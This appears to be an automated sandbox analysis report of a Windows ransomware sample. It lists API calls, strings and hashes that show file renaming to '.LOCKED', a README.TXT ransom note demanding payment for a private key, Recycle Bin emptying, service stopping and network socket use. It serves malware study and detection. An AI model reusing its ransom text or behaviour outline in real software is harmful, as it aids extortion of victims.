                                  • Sleep.KERNEL32(0000000A), ref: 005C80BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  Similarity
                                  • API ID: CriticalSection$File$EnterLeaveSleep$AttributesMessagePost$CreateInterlocked$AllocateDecrementErrorHeapIncrementLast
                                  • String ID: :$already$corrupt$no access$out of memory$success$too small
                                  • API String ID: 3985374689-3599528794

                                  Control-flow Graph (image not reproduced; legend: Executed, Not Executed)
                                  APIs
                                  • GetEnvironmentVariableW.KERNEL32(&r7r?r"rr), ref: 005C17B5
                                  • lstrcpyW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,?), ref: 005C191E
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,391467B9-BD4E-2B74-71A6-03A3DA3DE322), ref: 005C192C
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,00000014), ref: 005C1964
                                  • lstrlenA.KERNEL32(LOCKED), ref: 005C1978
                                  • lstrcatW.KERNEL32(.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED,?), ref: 005C19C6
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,OCKED,000000FF,LOCKED,00000007), ref: 005C19ED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcat$ByteCharEnvironmentMultiVariableWidelstrcpylstrlen
                                  • String ID: noj~u}7}vy$&r7r?r"rr$.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED$391467B9-BD4E-2B74-71A6-03A3DA3DE322$5$LOCKED$P$=$_$i$i$i$r&?r$*
                                  • API String ID: 2867850816-1516431644
                                  • Opcode ID: 874f60a6edb963da0c5dfcb14898dcbbd54b7964059e61b6bb987889ffabba49
                                  • Instruction ID: 57eb4db286620525cc91689ab08cea0ff43101987b90c6c7e07d809cc4c51996
                                  • Opcode Fuzzy Hash: 874f60a6edb963da0c5dfcb14898dcbbd54b7964059e61b6bb987889ffabba49
                                  • Instruction Fuzzy Hash: DE81F520E04289AEDF11DFE89854AEEBFBABFA6304F14405EE444A7343C6745B46CB65

                                  APIs
                                  • CreateTimerQueue.KERNEL32 ref: 005C634C
                                  • ExitThread.KERNEL32 ref: 005C635A
                                  • GetQueuedCompletionStatus.KERNEL32(?,?,?,000000FF), ref: 005C6374
                                  • setsockopt.WS2_32(?,0000FFFF,00007010,00000000,00000000), ref: 005C63AE
                                  • getsockopt.WS2_32(?,0000FFFF,0000700C,?,?), ref: 005C63D2
                                  • shutdown.WS2_32(?,00000001), ref: 005C6419
                                  • closesocket.WS2_32(?), ref: 005C6422
                                  • GlobalFree.KERNEL32(00000000), ref: 005C6445
                                  • CreateTimerQueueTimer.KERNEL32(00000000,00000000,005C6321,00000000,00007530,00000000,00000000), ref: 005C64F6
                                  Similarity
                                  • API ID: Timer$CreateQueue$CompletionExitFreeGlobalQueuedStatusThreadclosesocketgetsockoptsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 2072280112-0
                                  • Opcode ID: 5c479a3c9ae3f3f202b82473b207404b7c472ccda40fc3f289b4a264eac73f9a
                                  • Instruction ID: 536041affdcaaf0a5f1c8121380b213be56c10ba80ffc11dea64573094e759be
                                  • Opcode Fuzzy Hash: 5c479a3c9ae3f3f202b82473b207404b7c472ccda40fc3f289b4a264eac73f9a
                                  • Instruction Fuzzy Hash: 1C618074A00600EFDB218FA0DD89F6A7BF9FF09B01F100A6DE94297690D731EA45DB61
                                  APIs
                                    • Part of subcall function 005C5CE2: socket.WS2_32(00000002,00000001,00000000), ref: 005C5CEF
                                    • Part of subcall function 005C5CE2: WSAIoctl.WS2_32(00000000,C8000006,25A207B9,00000010,006D95E4,00000004,00000000,00000000,00000000), ref: 005C5D33
                                    • Part of subcall function 005C5CE2: closesocket.WS2_32(00000000), ref: 005C5D3E
                                  • gethostname.WS2_32(?,00000100), ref: 005C6ADD
                                  • gethostbyname.WS2_32(?), ref: 005C6AEF
                                  • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 005C6AFF
                                  • InitializeCriticalSection.KERNEL32(006D95B4), ref: 005C6B17
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000606C,00000000,00000000,00000000), ref: 005C6B61
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00006336,00000000,00000000,00000000), ref: 005C6B7B
                                  • PostQueuedCompletionStatus.KERNEL32(00000000,00000001,00000000), ref: 005C6B95
                                  • DeleteCriticalSection.KERNEL32(006D95B4,00000000,00000000), ref: 005C6BB4
                                  • CloseHandle.KERNEL32 ref: 005C6BC0
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 005C6BCC
                                  • CloseHandle.KERNEL32(00000000,00000000,00000000), ref: 005C6BD8
                                  Similarity
                                  • API ID: CloseCreateHandle$CompletionCriticalSectionThread$DeleteInitializeIoctlPortPostQueuedStatusclosesocketgethostbynamegethostnamesocket
                                  • String ID:
                                  • API String ID: 1063477411-0
                                  • Opcode ID: 83509e553377d2fce0ee67ff8d32bdf5bb563405e0aba276e62d9a42495c19c3
                                  • Instruction ID: 6ec1dd6a83c0354c3b477a03e237893638fb63710b3f0b42a670a58cce4987b6
                                  • Opcode Fuzzy Hash: 83509e553377d2fce0ee67ff8d32bdf5bb563405e0aba276e62d9a42495c19c3
                                  • Instruction Fuzzy Hash: 613108B4D05205AFDB21AFA4BC88F667BAEF70575CF10263BA521D22A0D7718D81CB70
                                  APIs
                                  • lstrlenW.KERNEL32(00000000,?,00000001,00000000,?,?,?,005C6A27,?,00000000,006D95B4), ref: 005D1B85
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,005C6A27,?,00000000,006D95B4), ref: 005D1B96
                                  • lstrcpyW.KERNEL32(00000000,'j\,?,005C6A27,?,00000000,006D95B4), ref: 005D1BB8
                                  • lstrcpyW.KERNEL32(00000000,?,?,005C6A27,?,00000000,006D95B4), ref: 005D1BBE
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,005C6A27,?,00000000,006D95B4), ref: 005D1BC5
                                  • PostMessageW.USER32(0000069A,00000000,00000000), ref: 005D1BD8
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,005C6A27,?,00000000,006D95B4), ref: 005D1BE5
                                  Strings
                                  Similarity
                                  • API ID: CriticalSectionlstrcpylstrlen$AllocateEnterHeapLeaveMessagePost
                                  • String ID: 'j\
                                  • API String ID: 393566716-1066145669
                                  • Opcode ID: 2302989413c96aa2e2f56ca3b0374ac17f983dda04af4c0506c38846ba3ba31f
                                  • Instruction ID: 32a39f0c13d7159bd501d2a5f45155c88fa36c0125404b1900b89713d431f147
                                  • Opcode Fuzzy Hash: 2302989413c96aa2e2f56ca3b0374ac17f983dda04af4c0506c38846ba3ba31f
                                  • Instruction Fuzzy Hash: 5C01A1729006147BDB216BE8AC4DE6E7EAEEBC5750F05011FF90197220EA759D418B94
                                  APIs
                                  • lstrlenW.KERNEL32(?,00000001,00000000,00000000,?,005C87CC,0000001B,0000001F), ref: 005D1C22
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • lstrlenW.KERNEL32(?,?,005C87CC,0000001B,0000001F), ref: 005D1C35
                                  • wvsprintfW.USER32(00000000,?,0000001F), ref: 005D1C55
                                  • lstrcpyW.KERNEL32(00000000,?,?,005C87CC,0000001B,0000001F), ref: 005D1C63
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,005C87CC,0000001B,0000001F), ref: 005D1C6E
                                  • PostMessageW.USER32(0000069C,00000000,00000000), ref: 005D1C81
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,005C87CC,0000001B,0000001F), ref: 005D1C8E
                                  Similarity
                                  • API ID: CriticalSectionlstrlen$AllocateEnterHeapLeaveMessagePostlstrcpywvsprintf
                                  • String ID:
                                  • API String ID: 3891508472-0
                                  • Opcode ID: 747e7fac786e6306b581fde0b4151e453662580b1ac9220361dcc1427a25b7e0
                                  • Instruction ID: 7d6189cf5c693287817b789a38bc40beb1c1bb6eeab4223d2304a3269b281823
                                  • Opcode Fuzzy Hash: 747e7fac786e6306b581fde0b4151e453662580b1ac9220361dcc1427a25b7e0
                                  • Instruction Fuzzy Hash: F5118236650A14BBCB215FE8AD4CA7A3F6EFBC5751F00112BFA06C6230DA719D11C794
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006D95B4), ref: 005C6074
                                  • LeaveCriticalSection.KERNEL32(006D95B4), ref: 005C6085
                                  • Sleep.KERNEL32(000003E8), ref: 005C6090
                                  • LeaveCriticalSection.KERNEL32(006D95B4), ref: 005C60B5
                                  • ExitThread.KERNEL32 ref: 005C60DA
                                  Similarity
                                  • API ID: CriticalSection$Leave$EnterExitSleepThread
                                  • String ID:
                                  • API String ID: 1955914877-0
                                  • Opcode ID: 33368c9befba6082debdf2fb9938becf51508539a7b80045ce03f85ab2453694
                                  • Instruction ID: e36b7af6421a119a305e5a598c3f7b52fb815be78e93776faea144057afadb64
                                  • Opcode Fuzzy Hash: 33368c9befba6082debdf2fb9938becf51508539a7b80045ce03f85ab2453694
                                  • Instruction Fuzzy Hash: 43018134602701DFC7659FA0DE8CF1A7BBABB457057502A1CE647ABB91CB31AD418B50
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,08000000,00000000,00000000,00000000,006D9A1C,00000000,?,005C8208,README.TXT), ref: 005C9FBF
                                  • WriteFile.KERNEL32(00000000,YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke,?,?,00000000,?,005C8208,README.TXT), ref: 005C9FD8
                                  • CloseHandle.KERNEL32(00000000,?,005C8208,README.TXT), ref: 005C9FDF
                                  Strings
                                  • YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke, xrefs: 005C9FD6
                                  Similarity
                                  • API ID: File$CloseCreateHandleWrite
                                  • String ID: YOUR FILES ARE ENCRYPTEDYour files, documents, photos, databases and other important files are encrypted.You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key.Only we can give you this ke
                                  • API String ID: 1065093856-2326073150
                                  • Opcode ID: b49c44c767d771e51e42755713527a436eb4072cd9f60b10d45c601be4b279a0
                                  • Instruction ID: d1cf7103d503e660a2d4bd2157224e4a384e614d819cc23be858df4ac36548e0
                                  • Opcode Fuzzy Hash: b49c44c767d771e51e42755713527a436eb4072cd9f60b10d45c601be4b279a0
                                  • Instruction Fuzzy Hash: CEF0A0B2610214BFE7109BA9AC4DFEF3AACDB8A771F104224F901E7190E2709E4186B0
                                  APIs
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB429
                                  • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB456
                                  • QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,005CB73D,?,?,?,?,?,?,?,?,?,005CB73D), ref: 005CB469
                                  • GetTickCount.KERNEL32 ref: 005CB478
                                  Similarity
                                  • API ID: Service$ControlCountQuerySleepStatusTick
                                  • String ID:
                                  • API String ID: 377103355-0
                                  • Opcode ID: 9c13b17a1764dc9db99a428214e50b9924854f4d623a093e174d6b5af71daff4
                                  • Instruction ID: 6b1a32b92c2ec9ee7fda745cc7044f0ccc3bca48599c707c667cd6219bb52cf6
                                  • Opcode Fuzzy Hash: 9c13b17a1764dc9db99a428214e50b9924854f4d623a093e174d6b5af71daff4
                                  • Instruction Fuzzy Hash: A501C431A08108AFEB28CAE49CC9FAE3BEEFB45745F10053EE205D2180DB60CD418665
                                  APIs
                                    • Part of subcall function 005C9F53: FindFirstFileW.KERNEL32(?,?), ref: 005C9F64
                                    • Part of subcall function 005C9F53: FindClose.KERNEL32(00000000), ref: 005C9F70
                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,08000000,00000000,006D9048,00000000,00000000,00000000,00000000,?,005C17DC,00000240), ref: 005CA01C
                                  • ReadFile.KERNEL32(00000000,006D9048,?,?,00000000,?,005C17DC,00000240), ref: 005CA035
                                  • CloseHandle.KERNEL32(00000000,?,005C17DC,00000240), ref: 005CA03C
                                  Similarity
                                  • API ID: File$CloseFind$CreateFirstHandleRead
                                  • String ID:
                                  • API String ID: 389924854-0
                                  • Opcode ID: ea8140cdfda668e631c44584473328d6b63326e4a3f090fff561634648facc64
                                  • Instruction ID: c999b2c4c2dfaa4e171ccb0ce9743b482f8daf68ba03942078b551e5d720ebb4
                                  • Opcode Fuzzy Hash: ea8140cdfda668e631c44584473328d6b63326e4a3f090fff561634648facc64
                                  • Instruction Fuzzy Hash: 6AF0B471610218BFE71067B99C4DFBB7AACEF493A1F144229B900E7190E6B09E4186B0
                                  APIs
                                  • EnterCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B01
                                  • KiUserCallbackDispatcher.NTDLL(00010456,00000001), ref: 005D1B09
                                  • LeaveCriticalSection.KERNEL32(006DA3EC,?,00000000,?,005C67AA), ref: 005D1B10
                                  Similarity
                                  • API ID: CriticalSection$CallbackDispatcherEnterLeaveUser
                                  • String ID:
                                  • API String ID: 351745511-0
                                  • Opcode ID: 650e1b775361762393f208989e2c3fd309af7485a1aa53f71b6f7be10fbacb27
                                  • Instruction ID: 4b1da30d76ba9ad6100afabc37591b80c25fbe5f4dfba9b063f1b738ac935d56
                                  • Opcode Fuzzy Hash: 650e1b775361762393f208989e2c3fd309af7485a1aa53f71b6f7be10fbacb27
                                  • Instruction Fuzzy Hash: 0A011232D0F950FFCB244B8CAE885167B7AF74531171A2553E9057B322D3B42C419BD9
                                  APIs
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 005C5CEF
                                  • WSAIoctl.WS2_32(00000000,C8000006,25A207B9,00000010,006D95E4,00000004,00000000,00000000,00000000), ref: 005C5D33
                                  • closesocket.WS2_32(00000000), ref: 005C5D3E
                                  Similarity
                                  • API ID: Ioctlclosesocketsocket
                                  • String ID:
                                  • API String ID: 1684324062-0
                                  • Opcode ID: 24c5905bf8126ecec6575c9c41d8f5e93c8199ad57fb2c92fc14e0acaac15310
                                  • Instruction ID: 34f7bf53a60222ad271a97bea3a9940459d04004e6d27ff0df110317adf489af
                                  • Opcode Fuzzy Hash: 24c5905bf8126ecec6575c9c41d8f5e93c8199ad57fb2c92fc14e0acaac15310
                                  • Instruction Fuzzy Hash: D4F06270A40715BEEB209FE58C4EFAE7ABDEB10754F104658F912FE1C0E3B05A414AB2
                                  APIs
                                  • TranslateMessage.USER32(?), ref: 005C9F2D
                                  • DispatchMessageW.USER32(?), ref: 005C9F37
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 005C9F46
                                  Similarity
                                  • API ID: Message$DispatchPeekTranslate
                                  • String ID:
                                  • API String ID: 4217535847-0
                                  • Opcode ID: 643740aaeff61d64b3e091fc6d63976458593e0a105c7a80344050429f82095a
                                  • Instruction ID: f705f255fd285315b73e5676ea3bdf7818ca0fe631797dd31370c8a5fc70fad3
                                  • Opcode Fuzzy Hash: 643740aaeff61d64b3e091fc6d63976458593e0a105c7a80344050429f82095a
                                  • Instruction Fuzzy Hash: 1AF03076D10249ABDF205BE5DC0DEAB7BBDAB81B00F005529A512D6450E6B89546C760
                                  APIs
                                  • htons.WS2_32(000001BD), ref: 005C62C8
                                  • WSAGetLastError.WS2_32(?,?,005C64E2), ref: 005C62FF
                                  Similarity
                                  • API ID: ErrorLasthtons
                                  • String ID:
                                  • API String ID: 1658467590-0
                                  • Opcode ID: 057f337f1e50bc9a9a4f144a27a91aa00ffdf403ab15f4e7e7736e60c0f14c9d
                                  • Instruction ID: 2ce5d5d0664e661db25b9310994bd926e24902f4045e7f36aa802bd35d451342
                                  • Opcode Fuzzy Hash: 057f337f1e50bc9a9a4f144a27a91aa00ffdf403ab15f4e7e7736e60c0f14c9d
                                  • Instruction Fuzzy Hash: D3010435901358AFDB218FE49941FAB7BBCFF15B04F00061EE842A7291D360EE448BB1
                                  APIs
                                  • _free.LIBCMT ref: 006781C8
                                    • Part of subcall function 0067718E: RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  • RtlReAllocateHeap.NTDLL(00000000,?,?,00000004,00000000,?,006779DC,?,00000004,00000000,?,?,?,0066958B,?,00000000), ref: 00678204
                                  Similarity
                                  • API ID: AllocateHeap$_free
                                  • String ID:
                                  • API String ID: 1482568997-0
                                  • Opcode ID: e7daa54aa73211f6a8d6ea9ed5e656fd720b828c0e2e59352f18653c6a4c9d5d
                                  • Instruction ID: cd3d0d761625e6e8de3aef39692e02e8752e9b77eb1123938fcbe6558d2a8cc9
                                  • Opcode Fuzzy Hash: e7daa54aa73211f6a8d6ea9ed5e656fd720b828c0e2e59352f18653c6a4c9d5d
                                  • Instruction Fuzzy Hash: BFF0C8315411026EC7212A259C0CBAB376F9F81771BA4C11AFC1D97690DE30CD0382A4
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 006771C0
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ca40bd8fa624ee56fc80d4f07313e90b17160b598c2c4c6dfab0ebd02e03d922
                                  • Instruction ID: 66aa17c21157da9e567ed0cef934a9c5e46010f2bbdc58589ac983f8abbade6d
                                  • Opcode Fuzzy Hash: ca40bd8fa624ee56fc80d4f07313e90b17160b598c2c4c6dfab0ebd02e03d922
                                  • Instruction Fuzzy Hash: C8E0E53510822266E7202A659C0479B3A5F9F023A0F9D9221AC0D96391CE20DC0183F4
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_000085EE,00000000,00000000,00000000), ref: 005C8D7F
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 08e5de1ba353209b133e7d7f7d77bbd8607cc98ef95a1ad4ee222b8c1a38f3f7
                                  • Instruction ID: a776637613145481680ce11a42c5f228af51b61a66964db2916a5906f3b7a121
                                  • Opcode Fuzzy Hash: 08e5de1ba353209b133e7d7f7d77bbd8607cc98ef95a1ad4ee222b8c1a38f3f7
                                  • Instruction Fuzzy Hash: 68D09EF4652201BFFB691BA05D59F762A5EF751716F18151DB803C94D0DFB84C80D670
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000671D,00000000,00000000,00000000), ref: 005C6C09
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 6916c674857ea5f7e4718e19770aaa6766fbc18a07c4767a4cec63e966882c0b
                                  • Instruction ID: ae9e1f7540de8912d8cb44d9e8693e17511b2e11916b12bb836726561b31aa29
                                  • Opcode Fuzzy Hash: 6916c674857ea5f7e4718e19770aaa6766fbc18a07c4767a4cec63e966882c0b
                                  • Instruction Fuzzy Hash: D2D012A4A022007DFF101AE05E0AF372A8EFB4070AF80186EBC46C4090C6A44E408930
                                  APIs
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B49B,00000000,00000000,00000000), ref: 005CB893
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: ac5f58c8b1e233e4eb3270a3ef6b5dae4d61c631e3d031ad484ff34e2af7b45d
                                  • Instruction ID: ce7d2e2a136afe6241c419b88b18f48dfae8df90c2e833d1ae4385569a40de4b
                                  • Opcode Fuzzy Hash: ac5f58c8b1e233e4eb3270a3ef6b5dae4d61c631e3d031ad484ff34e2af7b45d
                                  • Instruction Fuzzy Hash: E7D012B8E692007DFF18A2E08C1BF372B0FFB42B06F40551CFC01C0081C3688C008161
                                  APIs
                                  • SHEmptyRecycleBinW.SHELL32(00000000,00000000,00000007), ref: 005CC33E
                                  Similarity
                                  • API ID: EmptyRecycle
                                  • String ID:
                                  • API String ID: 983236787-0
                                  • Opcode ID: 1cf6aadd9d6018cacac6e5d10003306e4105efad5813e96587a6c64f28b45b2c
                                  • Instruction ID: da8a3147cdccf518e1dd2854961b63ef893bc06e234756e08a0da12f9a50fe92
                                  • Opcode Fuzzy Hash: 1cf6aadd9d6018cacac6e5d10003306e4105efad5813e96587a6c64f28b45b2c
                                  • Instruction Fuzzy Hash: 23B0127438530263F7180334AC17F1614881B05B02F1050297207EC8D0CA9090114604
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: b43ecde045c731e69df9120491a0ca1208878498431cc9183c319585c132fae2
                                  • Instruction ID: 321ff34d95ac1d3753ed41d2ce561121c2a638df99862879027ffa84ca3f0ed5
                                  • Opcode Fuzzy Hash: b43ecde045c731e69df9120491a0ca1208878498431cc9183c319585c132fae2
                                  • Instruction Fuzzy Hash: D9A002745715006EDF555710ED1DF153616B752701F40525562955417095512415D724
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 500cc3fc37a6c495613edd531c2fc827a796abac97f5fca630dab39b0ea25222
                                  • Instruction ID: f1f57faa3a94edb32eaca82ccb27c23f8d97fb9d60ab3a44190b53754a336fc2
                                  • Opcode Fuzzy Hash: 500cc3fc37a6c495613edd531c2fc827a796abac97f5fca630dab39b0ea25222
                                  • Instruction Fuzzy Hash: 1FA00270972100BFEF165B21FD0EF153B2BF742B42F602369B641990B0A6A23811DB38
                                  APIs
                                  • GetEnvironmentVariableW.KERNEL32(?,?,00000400), ref: 005C96E6
                                  • lstrcpyW.KERNEL32(?,00000000), ref: 005C9715
                                  • lstrcatW.KERNEL32(?), ref: 005C9729
                                  • lstrcatW.KERNEL32(?,00000023), ref: 005C976F
                                  • lstrlenW.KERNEL32(?,005C590E), ref: 005C97A3
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 005C97E5
                                  • lstrlenW.KERNEL32(0000005C), ref: 005C97F3
                                  • FindFirstFileW.KERNEL32(?,?), ref: 005C9860
                                  • DeleteFileW.KERNEL32(?), ref: 005C988D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 005C98A3
                                  • FindClose.KERNEL32(00000000), ref: 005C98AE
                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00008000), ref: 005C9A05
                                  • CopyFileW.KERNEL32(00000000,?,00000000), ref: 005C9A1C
                                  • GetCommandLineW.KERNEL32 ref: 005C9A2D
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 005C9A3A
                                  • lstrlenW.KERNEL32(00000000), ref: 005C9A48
                                  • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9A97
                                  • ExitProcess.KERNEL32 ref: 005C9AA9
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  Similarity
                                  • API ID: File$Findlstrlen$CommandCreateLineProcesslstrcat$ArgvCloseCopyDeleteDirectoryEnvironmentExitFirstFreeHeapModuleNameNextVariablelstrcpy
                                  • String ID: #$%$%$%$%$%$%$%$%$%$%$%$%$%$%$0$4$@$@$\$]$^$^$^$^#^$k$k$w$z$z$z$z$z$z$z$z$|$~
                                  • API String ID: 675711421-249533007
                                  • Opcode ID: 78f72355f6cf6fb8af57ec6edd766e2116a02e1e7c24e2610f280af4ba9a3add
                                  • Instruction ID: 61ea6d24f9b2c4e8da08d52f71f791e2629a3f6d0d8ac559895ba2c99529a26a
                                  • Opcode Fuzzy Hash: 78f72355f6cf6fb8af57ec6edd766e2116a02e1e7c24e2610f280af4ba9a3add
                                  • Instruction Fuzzy Hash: E4024F31D052CCEFDF11CBE8D988ADEBFB5AF22304F144099E484AB242D6755B4ACB65
                                  APIs
                                  • StrStrA.SHLWAPI(006D2040,?), ref: 005C8EFA
                                  • GetCommandLineW.KERNEL32(?), ref: 005C8F3C
                                  • CommandLineToArgvW.SHELL32(00000000), ref: 005C8F43
                                  • MessageBoxA.USER32(00000000,00000000,006CAB4A,00040010), ref: 005C92B8
                                  • ExitProcess.KERNEL32 ref: 005C92C0
                                  • StrToIntW.SHLWAPI(?), ref: 005C9341
                                  Similarity
                                  • API ID: CommandLine$ArgvExitMessageProcess
                                  • String ID: '$1$@ m$A$A$B$B$B$C$F$H$H$H$I$I$I$I$K$K$LOCKED$N$R$S$S$S$U$]zw{ffqw`4z{`q4g}nq5$_$f
                                  • API String ID: 494642019-2656225804
                                  • Opcode ID: 00da4e0b8dc14506e19732bae59eb6d9e65d0453dcdfca0442921e1bb5dbe321
                                  • Instruction ID: 49007ed61e6cf173648f8d0a56ba2ee1cfc223ff0269f4492e85201a2ebf4966
                                  • Opcode Fuzzy Hash: 00da4e0b8dc14506e19732bae59eb6d9e65d0453dcdfca0442921e1bb5dbe321
                                  • Instruction Fuzzy Hash: BD2280219092D9AEDF15DBFCD44DBEEBFB1BF62308F08444DD0816B243C6699A06C766
                                  APIs
                                    • Part of subcall function 005C7109: InitializeCriticalSection.KERNEL32(?,?,005C5657), ref: 005C710D
                                    • Part of subcall function 005C7109: EnterCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7114
                                    • Part of subcall function 005C7109: LeaveCriticalSection.KERNEL32(?,?,005C5657), ref: 005C7124
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1021
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C102F
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C105A
                                    • Part of subcall function 005C1000: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,00000001), ref: 005C1086
                                    • Part of subcall function 005C1000: lstrlenA.KERNEL32 ref: 005C1097
                                  • InitializeCriticalSection.KERNEL32(006D9898,?,?,00000000), ref: 005C883F
                                  • lstrcpyW.KERNEL32(success,00000074,?,?,00000000), ref: 005C88B7
                                  • lstrcpyW.KERNEL32(out of memory,2](])]}]2];]}]0]8]0]2]/]$]],?,?,00000000), ref: 005C8971
                                  • lstrcpyW.KERNEL32(no access,?,?,?,00000000), ref: 005C8A4A
                                  • lstrcpyW.KERNEL32(too small,?,?,?,00000000), ref: 005C8B24
                                  • lstrcpyW.KERNEL32(already,0000000C,?,?,00000000), ref: 005C8B7E
                                  • lstrcpyW.KERNEL32(corrupt,?,?,?,00000000), ref: 005C8C30
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: lstrcpy$CriticalSectionlstrlen$Initialize$ByteCharEnterLeaveMultiWide
                                  • String ID: #recycle$.386$2](])]}]2];]}]0]8]0]2]/]$]]$9$]$already$autorun.inf$b$corrupt$d$d$m$m$no access$out of memory$p$q$r$success$t$t$t$too small$x$~
                                  • API String ID: 3132918104-973384122
